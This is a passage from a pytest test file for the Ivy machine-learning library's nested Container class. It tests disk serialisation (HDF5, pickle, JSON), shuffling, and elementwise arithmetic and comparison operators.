assert np.array_equal(ivy.to_numpy(containerx["b"]["c"]), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(containerx.b.c), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(containerx["b"]["d"]), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(containerx.b.d), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(containery["a"]), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(containery.a), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(containery["b"]["c"]), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(containery.b.c), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(containery["b"]["d"]), np.array([3.0]))
assert np.array_equal(ivy.to_numpy(containery.b.d), np.array([3.0]))
def test_container_to_and_from_disk_as_hdf5(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = "container_on_disk.hdf5"
dict_in_1 = {
"a": ivy.array([np.float32(1.0)], device=device),
"b": {
"c": ivy.array([np.float32(2.0)], device=device),
"d": ivy.array([np.float32(3.0)], device=device),
},
}
container1 = Container(dict_in_1)
dict_in_2 = {
"a": ivy.array([np.float32(1.0), np.float32(1.0)], device=device),
"b": {
"c": ivy.array([np.float32(2.0), np.float32(2.0)], device=device),
"d": ivy.array([np.float32(3.0), np.float32(3.0)], device=device),
},
}
container2 = Container(dict_in_2)
# saving
container1.to_disk_as_hdf5(save_filepath, max_batch_size=2)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_hdf5(save_filepath, slice(1))
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container1.a))
assert np.array_equal(
ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container1.b.c)
)
assert np.array_equal(
ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container1.b.d)
)
# appending
container1.to_disk_as_hdf5(save_filepath, max_batch_size=2, starting_index=1)
assert os.path.exists(save_filepath)
# loading after append
loaded_container = Container.from_disk_as_hdf5(save_filepath)
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container2.a))
assert np.array_equal(
ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container2.b.c)
)
assert np.array_equal(
ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container2.b.d)
)
# load slice
loaded_sliced_container = Container.from_disk_as_hdf5(save_filepath, slice(1, 2))
assert np.array_equal(
ivy.to_numpy(loaded_sliced_container.a), ivy.to_numpy(container1.a)
)
assert np.array_equal(
ivy.to_numpy(loaded_sliced_container.b.c), ivy.to_numpy(container1.b.c)
)
assert np.array_equal(
ivy.to_numpy(loaded_sliced_container.b.d), ivy.to_numpy(container1.b.d)
)
# file size
file_size, batch_size = Container.h5_file_size(save_filepath)
assert file_size == 6 * np.dtype(np.float32).itemsize
assert batch_size == 2
os.remove(save_filepath)
def test_container_to_disk_shuffle_and_from_disk_as_hdf5(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = "container_on_disk.hdf5"
dict_in = {
"a": ivy.array([1, 2, 3], device=device),
"b": {
"c": ivy.array([1, 2, 3], device=device),
"d": ivy.array([1, 2, 3], device=device),
},
}
container = Container(dict_in)
# saving
container.to_disk_as_hdf5(save_filepath, max_batch_size=3)
assert os.path.exists(save_filepath)
# shuffling
Container.shuffle_h5_file(save_filepath)
# loading
container_shuffled = Container.from_disk_as_hdf5(save_filepath, slice(3))
# testing
data = np.array([1, 2, 3])
random.seed(0)
random.shuffle(data)
assert (ivy.to_numpy(container_shuffled["a"]) == data).all()
assert (ivy.to_numpy(container_shuffled.a) == data).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == data).all()
assert (ivy.to_numpy(container_shuffled["b"]["d"]) == data).all()
assert (ivy.to_numpy(container_shuffled.b.d) == data).all()
os.remove(save_filepath)
def test_container_pickle(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
dict_in = {
"a": ivy.array([np.float32(1.0)], device=device),
"b": {
"c": ivy.array([np.float32(2.0)], device=device),
"d": ivy.array([np.float32(3.0)], device=device),
},
}
# without module attribute
cont = Container(dict_in)
assert cont._local_ivy is None
pickled = pickle.dumps(cont)
cont_again = pickle.loads(pickled)
assert cont_again._local_ivy is None
ivy.Container.identical_structure([cont, cont_again])
ivy.Container.identical_configs([cont, cont_again])
# with module attribute
cont = Container(dict_in, ivyh=ivy)
assert cont._local_ivy is ivy
pickled = pickle.dumps(cont)
cont_again = pickle.loads(pickled)
# noinspection PyUnresolvedReferences
assert cont_again._local_ivy.current_framework_str() is ivy.current_framework_str()
ivy.Container.identical_structure([cont, cont_again])
ivy.Container.identical_configs([cont, cont_again])
def test_container_to_and_from_disk_as_pickled(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = "container_on_disk.pickled"
dict_in = {
"a": ivy.array([np.float32(1.0)], device=device),
"b": {
"c": ivy.array([np.float32(2.0)], device=device),
"d": ivy.array([np.float32(3.0)], device=device),
},
}
container = Container(dict_in)
# saving
container.to_disk_as_pickled(save_filepath)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_pickled(save_filepath)
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container.a))
assert np.array_equal(
ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container.b.c)
)
assert np.array_equal(
ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container.b.d)
)
os.remove(save_filepath)
def test_container_to_and_from_disk_as_json(device, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = "container_on_disk.json"
dict_in = {
"a": 1.274e-7,
"b": {"c": True, "d": ivy.array([np.float32(3.0)], device=device)},
}
container = Container(dict_in)
# saving
container.to_disk_as_json(save_filepath)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_json(save_filepath)
assert np.array_equal(loaded_container.a, container.a)
assert np.array_equal(loaded_container.b.c, container.b.c)
assert isinstance(loaded_container.b.d, str)
os.remove(save_filepath)
def test_container_positive(device, call):
container = +Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([-2], device=device),
"d": ivy.array([3], device=device),
},
}
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([-2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([-2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_negative(device, call):
container = -Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([-2], device=device),
"d": ivy.array([3], device=device),
},
}
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([-1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([-1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([-3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([-3]))
def test_container_pow(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([6], device=device),
},
}
)
container = container_a**container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([16]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([16]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([729]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([729]))
def test_container_scalar_pow(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container_a**2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([9]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([9]))
def test_container_reverse_scalar_pow(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2**container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([8]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([8]))
def test_container_scalar_addition(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container += 3
assert np.allclose(ivy.to_numpy(container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
def test_container_reverse_scalar_addition(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 3 + container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
def test_container_addition(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([6], device=device),
},
}
)
container = container_a + container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.a), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([6]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([9]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([9]))
def test_container_scalar_subtraction(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container -= 1
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_reverse_scalar_subtraction(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 1 - container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([-1]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([-1]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([-2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([-2]))
def test_container_subtraction(device, call):
container_a = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([1], device=device),
"d": ivy.array([4], device=device),
},
}
)
container = container_a - container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_scalar_multiplication(device, call):
container = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([2.0], device=device),
"d": ivy.array([3.0], device=device),
},
}
)
container *= 2.5
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5.0]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5.0]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([7.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([7.5]))
def test_container_reverse_scalar_multiplication(device, call):
container = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([2.0], device=device),
"d": ivy.array([3.0], device=device),
},
}
)
container = 2.5 * container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5.0]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5.0]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([7.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([7.5]))
def test_container_multiplication(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([6], device=device),
},
}
)
container = container_a * container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([8]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([8]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([18]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([18]))
def test_container_scalar_truediv(device, call):
container = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([5.0], device=device),
"d": ivy.array([5.0], device=device),
},
}
)
container /= 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2.5]))
def test_container_reverse_scalar_truediv(device, call):
container = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([5.0], device=device),
"d": ivy.array([5.0], device=device),
},
}
)
container = 2 / container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2.0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([0.4]))
def test_container_truediv(device, call):
container_a = Container(
{
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([5.0], device=device),
"d": ivy.array([5.0], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2.0], device=device),
"b": {
"c": ivy.array([2.0], device=device),
"d": ivy.array([4.0], device=device),
},
}
)
container = container_a / container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([1.25]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([1.25]))
def test_container_scalar_floordiv(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the // operator, can add if explicit
# ivy.floordiv is implemented at some point
pytest.skip()
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container //= 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_reverse_scalar_floordiv(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the // operator, can add if explicit
# ivy.floordiv is implemented at some point
pytest.skip()
container = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([1], device=device),
"d": ivy.array([7], device=device),
},
}
)
container = 5 // container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([0]))
def test_container_floordiv(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the // operator, can add if explicit
# ivy.floordiv is implemented at some point
pytest.skip()
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([4], device=device),
},
}
)
container = container_a // container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([1]))
def test_container_abs(device, call):
container = abs(
Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([-2], device=device),
"d": ivy.array([3], device=device),
},
}
)
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_scalar_less_than(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container < 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_less_than(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 < container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_less_than(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a < container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_less_than_or_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container <= 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_less_than_or_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 <= container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_less_than_or_equal_to(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a <= container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container == 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 == container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_equal_to(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a == container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_not_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container != 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_not_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 != container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_not_equal_to(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a != container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_greater_than(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container > 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_greater_than(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 > container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_greater_than(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a > container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_greater_than_or_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = container >= 2
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
